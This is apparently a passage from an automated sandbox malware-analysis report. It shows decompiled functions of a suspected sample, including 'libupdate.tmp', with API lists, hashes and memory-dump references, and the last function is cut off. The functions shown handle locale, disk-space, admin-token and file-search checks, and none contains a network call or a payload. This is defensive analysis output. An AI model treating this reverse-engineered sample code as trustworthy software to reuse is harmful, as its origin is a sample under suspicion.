                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                                    • LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                    • String ID:
                                                                    • API String ID: 3990497365-0
                                                                    • Opcode ID: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
                                                                    • Instruction ID: 1578eb45e464442e6080653f6025888c356fcaddc808aab3f6789ba0ce71ce89
                                                                    • Opcode Fuzzy Hash: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
                                                                    • Instruction Fuzzy Hash: 3E412374A002589FDB20DF59CC81BCAB7F9AB58304F4044FAE508E7242D7799E95CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040A6C8, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E0040A6C8(signed short __eax, void* __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				char _v26;
				char _v32;
				void* __ebp;
				void* _t39;
				void* _t55;
				void* _t59;
				short* _t62;
				signed short _t66;
				void* _t67;
				void* _t68;
				signed short _t79;
				void* _t81;

				_t81 = __edx;
				_t66 = __eax;
				_v16 = 0;
				if(__eax !=  *0x4bdc08()) {
					_v16 = E0040A684( &_v8);
					_t79 = _t66;
					_v20 = 3;
					_t62 =  &_v26;
					do {
						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
						_t79 = (_t79 & 0x0000ffff) >> 4;
						_v20 = _v20 - 1;
						_t62 = _t62 - 2;
					} while (_v20 != 0xffffffff);
					_v24 = 0;
					_v22 = 0;
					 *0x4bdc04(4,  &_v32,  &_v20);
				}
				_t39 = E0040A684( &_v12);
				_t67 = _t39;
				if(_t67 != 0) {
					_t55 = _v12 - 2;
					if(_t55 >= 0) {
						_t59 = _t55 + 1;
						_v20 = 0;
						do {
							if( *((short*)(_t67 + _v20 * 2)) == 0) {
								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
							}
							_v20 = _v20 + 1;
							_t59 = _t59 - 1;
						} while (_t59 != 0);
					}
					E00408550(_t81, _t67);
					_t39 = E0040540C(_t67);
				}
				if(_v16 != 0) {
					 *0x4bdc04(0, 0,  &_v20);
					_t68 = E0040A684( &_v12);
					if(_v8 != _v12 || E0040A660(_v16, _v12, _t68) != 0) {
						 *0x4bdc04(8, _v16,  &_v20);
					}
					E0040540C(_t68);
					return E0040540C(_v16);
				}
				return _t39;
			}





















                                                                    0x0040a6d0
                                                                    0x0040a6d2
                                                                    0x0040a6d6
                                                                    0x0040a6e2
                                                                    0x0040a6ec
                                                                    0x0040a6ef
                                                                    0x0040a6f1
                                                                    0x0040a6f8
                                                                    0x0040a6fb
                                                                    0x0040a70c
                                                                    0x0040a712
                                                                    0x0040a715
                                                                    0x0040a718
                                                                    0x0040a71b
                                                                    0x0040a721
                                                                    0x0040a727
                                                                    0x0040a737
                                                                    0x0040a737
                                                                    0x0040a740
                                                                    0x0040a745
                                                                    0x0040a749
                                                                    0x0040a74e
                                                                    0x0040a753
                                                                    0x0040a755
                                                                    0x0040a756
                                                                    0x0040a75d
                                                                    0x0040a765
                                                                    0x0040a76a
                                                                    0x0040a76a
                                                                    0x0040a770
                                                                    0x0040a773
                                                                    0x0040a773
                                                                    0x0040a75d
                                                                    0x0040a77a
                                                                    0x0040a781
                                                                    0x0040a781
                                                                    0x0040a78a
                                                                    0x0040a794
                                                                    0x0040a7a2
                                                                    0x0040a7aa
                                                                    0x0040a7c7
                                                                    0x0040a7c7
                                                                    0x0040a7cf
                                                                    0x00000000
                                                                    0x0040a7d7
                                                                    0x0040a7e1

                                                                    APIs
                                                                    • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040A6D9
                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040A737
                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040A794
                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040A7C7
                                                                      • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040A745), ref: 0040A69B
                                                                      • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040A745), ref: 0040A6B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Thread$LanguagesPreferred$Language
                                                                    • String ID:
                                                                    • API String ID: 2255706666-0
                                                                    • Opcode ID: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
                                                                    • Instruction ID: 64ac70e7ec2a8712ea9b0e83aabe60772fb1db60419ab041f5eb1837937ee239
                                                                    • Opcode Fuzzy Hash: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
                                                                    • Instruction Fuzzy Hash: 97317070E0021A9BDB10DFA9C884AAFB7B8EF04304F00867AE555E7291EB789E05CB55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00420BD8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00420BD8() {
				void* __ebx;
				struct HINSTANCE__* _t1;
				void* _t4;

				_t1 = GetModuleHandleW(L"kernel32.dll");
				_t3 = _t1;
				if(_t1 != 0) {
					_t1 = E0040E1A8(_t3, _t4, _t3, L"GetDiskFreeSpaceExW");
					 *0x4b7e30 = _t1;
				}
				if( *0x4b7e30 == 0) {
					 *0x4b7e30 = E0041A4DC;
					return E0041A4DC;
				}
				return _t1;
			}






                                                                    0x00420bde
                                                                    0x00420be3
                                                                    0x00420be7
                                                                    0x00420bef
                                                                    0x00420bf4
                                                                    0x00420bf4
                                                                    0x00420c00
                                                                    0x00420c07
                                                                    0x00000000
                                                                    0x00420c07
                                                                    0x00420c0d

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00420CB4,00000000,00420CCC,?,?,00420C69), ref: 00420BDE
                                                                      • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                    • API String ID: 1646373207-1127948838
                                                                    • Opcode ID: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
                                                                    • Instruction ID: d69f2d486575a746b5ffe9d6a82661523d0842203aaa5c8b8dd0cb43f1f92830
                                                                    • Opcode Fuzzy Hash: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
                                                                    • Instruction Fuzzy Hash: 31D05EB03143165FE7056BB2ACC561636C6AB86304B900B7BA5046A243CBFDDC50434C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Analysis Process: libupdate.tmp PID: 6876 Parent PID: 4568 libupdate.tmpCOMMON

                                                                    Executed Functions

                                                                    Function 005C7CE0, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 181memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 43%
                                                                    			E005C7CE0(long __eax) {
				signed char _v5;
				void* _v12;
				char _v16;
				void* _v20;
				long _v24;
				void* _v28;
				struct _SID_IDENTIFIER_AUTHORITY* _v32;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t89;
				long _t97;
				signed int _t100;
				intOrPtr _t105;
				intOrPtr _t106;
				void* _t107;
				void* _t110;
				void* _t111;
				void* _t113;
				void* _t115;
				intOrPtr _t116;

				_t113 = _t115;
				_t116 = _t115 + 0xffffffe4;
				_push(_t107);
				_t97 = __eax;
				if(E00429D18() == 2) {
					_v5 = 0;
					_v32 = 0x6ccce0;
					if(AllocateAndInitializeSid(_v32, 2, 0x20, _t97, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
						goto L26;
					} else {
						_push(_t113);
						_push(0x5c7ecb);
						_push( *[fs:eax]);
						 *[fs:eax] = _t116;
						_t99 = 0;
						if((GetVersion() & 0x000000ff) >= 5) {
							_t99 = E00414020(0, _t107, GetModuleHandleW(L"advapi32.dll"), L"CheckTokenMembership");
						}
						if(_t99 == 0) {
							_v28 = 0;
							if(OpenThreadToken(GetCurrentThread(), 8, 0xffffffff,  &_v20) != 0) {
								L13:
								_push(_t113);
								_push(0x5c7ead);
								_push( *[fs:eax]);
								 *[fs:eax] = _t116;
								_v24 = 0;
								if(GetTokenInformation(_v20, 2, 0, 0,  &_v24) != 0 || GetLastError() == 0x7a) {
									_v28 = E00406F0C(_v24);
									if(GetTokenInformation(_v20, 2, _v28, _v24,  &_v24) != 0) {
										_t110 =  *_v28 - 1;
										if(_t110 >= 0) {
											_t111 = _t110 + 1;
											_t100 = 0;
											while(EqualSid(_v12,  *(_v28 + 4 + _t100 * 8)) == 0 || ( *(_v28 + 8 + _t100 * 8) & 0x00000014) != 4) {
												_t100 = _t100 + 1;
												_t111 = _t111 - 1;
												if(_t111 != 0) {
													continue;
												}
												goto L24;
											}
											_v5 = 1;
										}
										L24:
										_pop(_t105);
										 *[fs:eax] = _t105;
										_push(E005C7EB4);
										E00406F28(_v28);
										return CloseHandle(_v20);
									} else {
										E004099B8();
										E004099B8();
										goto L26;
									}
								} else {
									E004099B8();
									E004099B8();
									goto L26;
								}
							} else {
								if(GetLastError() == 0x3f0) {
									if(OpenProcessToken(GetCurrentProcess(), 8,  &_v20) != 0) {
										goto L13;
									} else {
										E004099B8();
										goto L26;
									}
								} else {
									E004099B8();
									goto L26;
								}
							}
						} else {
							_t89 =  *_t99(0, _v12,  &_v16); // executed
							if(_t89 != 0) {
								asm("sbb eax, eax");
								_v5 = _t89 + 1;
							}
							_pop(_t106);
							 *[fs:eax] = _t106;
							_push(E005C7ED2);
							return FreeSid(_v12);
						}
					}
				} else {
					_v5 = 1;
					L26:
					return _v5 & 0x000000ff;
				}
			}
























                                                                    0x005c7ce1
                                                                    0x005c7ce3
                                                                    0x005c7ce7
                                                                    0x005c7ce8
                                                                    0x005c7cf2
                                                                    0x005c7cfd
                                                                    0x005c7d06
                                                                    0x005c7d29
                                                                    0x00000000
                                                                    0x005c7d2f
                                                                    0x005c7d31
                                                                    0x005c7d32
                                                                    0x005c7d37
                                                                    0x005c7d3a
                                                                    0x005c7d3d
                                                                    0x005c7d4d
                                                                    0x005c7d64
                                                                    0x005c7d64
                                                                    0x005c7d68
                                                                    0x005c7d8f
                                                                    0x005c7da7
                                                                    0x005c7dde
                                                                    0x005c7de0
                                                                    0x005c7de1
                                                                    0x005c7de6
                                                                    0x005c7de9
                                                                    0x005c7dee
                                                                    0x005c7e06
                                                                    0x005c7e29
                                                                    0x005c7e45
                                                                    0x005c7e58
                                                                    0x005c7e5b
                                                                    0x005c7e5d
                                                                    0x005c7e5e
                                                                    0x005c7e60
                                                                    0x005c7e8a
                                                                    0x005c7e8b
                                                                    0x005c7e8c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x005c7e8c
                                                                    0x005c7e84
                                                                    0x005c7e84
                                                                    0x005c7e8e
                                                                    0x005c7e90
                                                                    0x005c7e93
                                                                    0x005c7e96
                                                                    0x005c7e9e
                                                                    0x005c7eac
                                                                    0x005c7e47
                                                                    0x005c7e47
                                                                    0x005c7e4c
                                                                    0x00000000
                                                                    0x005c7e4c
                                                                    0x005c7e12
                                                                    0x005c7e12
                                                                    0x005c7e17
                                                                    0x00000000
                                                                    0x005c7e17
                                                                    0x005c7da9
                                                                    0x005c7db3
                                                                    0x005c7dd2
                                                                    0x00000000
                                                                    0x005c7dd4
                                                                    0x005c7dd4
                                                                    0x00000000
                                                                    0x005c7dd4
                                                                    0x005c7db5
                                                                    0x005c7db5
                                                                    0x00000000
                                                                    0x005c7db5
                                                                    0x005c7db3
                                                                    0x005c7d6a
                                                                    0x005c7d74
                                                                    0x005c7d78
                                                                    0x005c7d82
                                                                    0x005c7d85
                                                                    0x005c7d85
                                                                    0x005c7eb6
                                                                    0x005c7eb9
                                                                    0x005c7ebc
                                                                    0x005c7eca
                                                                    0x005c7eca
                                                                    0x005c7d68
                                                                    0x005c7cf4
                                                                    0x005c7cf4
                                                                    0x005c7ed2
                                                                    0x005c7edb
                                                                    0x005c7edb

                                                                    APIs
                                                                    • AllocateAndInitializeSid.ADVAPI32(00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D22
                                                                    • GetVersion.KERNEL32(00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D3F
                                                                    • GetModuleHandleW.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D59
                                                                    • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D74
                                                                    • FreeSid.ADVAPI32(00000000,005C7ED2,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7EC5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AllocateCheckFreeHandleInitializeMembershipModuleTokenVersion
                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                    • API String ID: 2691416632-1888249752
                                                                    • Opcode ID: 7eaf172969854dfabfe2384070bf8caee8e22896a72bba252f0bea0079ae3f0e
                                                                    • Instruction ID: 9e47304f2c2519385998e5d426bc562542af73c677c294aaacd6cf1c30b33c32
                                                                    • Opcode Fuzzy Hash: 7eaf172969854dfabfe2384070bf8caee8e22896a72bba252f0bea0079ae3f0e
                                                                    • Instruction Fuzzy Hash: A2514472A0830D6EDB11EAF98D42FBE7BACBF1C705F1044AEF501E6681D6789D408B65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E7F0, Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 73%
                                                                    			E0040E7F0(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
				char _v8;
				short _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _t29;
				void* _t40;
				intOrPtr* _t44;
				intOrPtr _t55;
				void* _t61;

				_push(__ebx);
				_v24 = 0;
				_v20 = 0;
				_t44 = __edx;
				_v8 = __eax;
				E0040A2AC(_v8);
				_push(_t61);
				_push(0x40e8b0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xffffffec;
				_t21 =  &_v16;
				L0040524C();
				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
				E0040B318( &_v20, 4,  &_v16);
				E0040B4C8(_t44, _v20, _v8);
				_t29 = E0040E6A0( *_t44, _t44); // executed
				if(_t29 == 0) {
					_v12 = 0;
					E0040B318( &_v24, 4,  &_v16);
					E0040B4C8(_t44, _v24, _v8);
					_t40 = E0040E6A0( *_t44, _t44); // executed
					if(_t40 == 0) {
						E0040A1C8(_t44);
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E0040E8B7);
				E0040A228( &_v24, 2);
				return E0040A1C8( &_v8);
			}













                                                                    0x0040e7f6
                                                                    0x0040e7f9
                                                                    0x0040e7fc
                                                                    0x0040e7ff
                                                                    0x0040e801
                                                                    0x0040e807
                                                                    0x0040e80e
                                                                    0x0040e80f
                                                                    0x0040e814
                                                                    0x0040e817
                                                                    0x0040e81c
                                                                    0x0040e822
                                                                    0x0040e82b
                                                                    0x0040e83b
                                                                    0x0040e848
                                                                    0x0040e84f
                                                                    0x0040e856
                                                                    0x0040e858
                                                                    0x0040e869
                                                                    0x0040e876
                                                                    0x0040e87d
                                                                    0x0040e884
                                                                    0x0040e888
                                                                    0x0040e888
                                                                    0x0040e884
                                                                    0x0040e88f
                                                                    0x0040e892
                                                                    0x0040e895
                                                                    0x0040e8a2
                                                                    0x0040e8af

                                                                    APIs
                                                                    • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E822
                                                                    • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E82B
                                                                      • Part of subcall function 0040E6A0: FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
                                                                      • Part of subcall function 0040E6A0: FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                    • String ID:
                                                                    • API String ID: 3216391948-0
                                                                    • Opcode ID: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
                                                                    • Instruction ID: 1e50cd0e94847efb8cb05e6df71b151ee34378a03d53e12baea26e8823c5d93b
                                                                    • Opcode Fuzzy Hash: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
                                                                    • Instruction Fuzzy Hash: 71114270A002099BDB04EF96D982AAEB3B9EF45304F90487EF904B73C1D7395E148B6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060C2B0, Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 60%
                                                                    			E0060C2B0(void* __eax, struct _WIN32_FIND_DATAW* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				char _v16;
				long _v20;
				void* _t13;
				intOrPtr _t27;
				void* _t35;
				void* _t37;
				intOrPtr _t38;

				_t35 = _t37;
				_t38 = _t37 + 0xfffffff0;
				if(E0060BF74(__eax,  &_v16) != 0) {
					_push(_t35);
					_push(0x60c313);
					_push( *[fs:eax]);
					 *[fs:eax] = _t38;
					_t13 = FindFirstFileW(E0040B278(__edx), __ecx); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E0060C31A);
					return E0060BFB0( &_v16);
				} else {
					_v8 = 0xffffffff;
					return _v8;
				}
			}











                                                                    0x0060c2b1
                                                                    0x0060c2b3
                                                                    0x0060c2cb
                                                                    0x0060c2d8
                                                                    0x0060c2d9
                                                                    0x0060c2de
                                                                    0x0060c2e1
                                                                    0x0060c2ed
                                                                    0x0060c2f2
                                                                    0x0060c2fa
                                                                    0x0060c2ff
                                                                    0x0060c302
                                                                    0x0060c305
                                                                    0x0060c312
                                                                    0x0060c2cd
                                                                    0x0060c2cd
                                                                    0x0060c32c
                                                                    0x0060c32c

                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2ED
                                                                    • GetLastError.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2F5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorFileFindFirstLast
                                                                    • String ID:
                                                                    • API String ID: 873889042-0
                                                                    • Opcode ID: 2c28104d048e73625ee3d3eed8fae21a8e15aade9eb95d70cdbdcf15955165a1
                                                                    • Instruction ID: 0e0656a6fbe86c5836fc78b0efda7e26b232c5910eabf30e6ebd6b813bae866c
                                                                    • Opcode Fuzzy Hash: 2c28104d048e73625ee3d3eed8fae21a8e15aade9eb95d70cdbdcf15955165a1
                                                                    • Instruction Fuzzy Hash: 1BF0F931A84208ABCB14DFBA9C0189FF7ADEB4533075147BAF814D32D1DB744E004598
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E6A0, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 46%
                                                                    			E0040E6A0(char __eax, signed int __ebx) {
				char _v8;
				struct _WIN32_FIND_DATAW _v600;
				void* _t15;
				intOrPtr _t24;
				void* _t27;

				_push(__ebx);
				_v8 = __eax;
				E0040A2AC(_v8);
				_push(_t27);
				_push(0x40e6fe);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27 + 0xfffffdac;
				_t15 = FindFirstFileW(E0040B278(_v8),  &_v600); // executed
				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
					FindClose(_t15);
				}
				_pop(_t24);
				 *[fs:eax] = _t24;
				_push(E0040E705);
				return E0040A1C8( &_v8);
			}








                                                                    0x0040e6a9
                                                                    0x0040e6aa
                                                                    0x0040e6b0
                                                                    0x0040e6b7
                                                                    0x0040e6b8
                                                                    0x0040e6bd
                                                                    0x0040e6c0
                                                                    0x0040e6d3
                                                                    0x0040e6e0
                                                                    0x0040e6e3
                                                                    0x0040e6e3
                                                                    0x0040e6ea
                                                                    0x0040e6ed
                                                                    0x0040e6f0
                                                                    0x0040e6fd

                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
                                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
                                                                    • Instruction ID: dec86fcb97929b74413189edb203bd87f329489ef31ab21fd3caa719f1a03e71
                                                                    • Opcode Fuzzy Hash: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
                                                                    • Instruction Fuzzy Hash: 95F0B430540608AFCB10EBB6DC4295EB3ACEB4431479009B6F400F32D1EB395E10995C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E2C4, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 78%
                                                                    			E0040E2C4(char __eax, void* __ebx, void* __ecx, void* __edx) {
				char _v8;
				char* _v12;
				void* _v16;
				int _v20;
				short _v542;
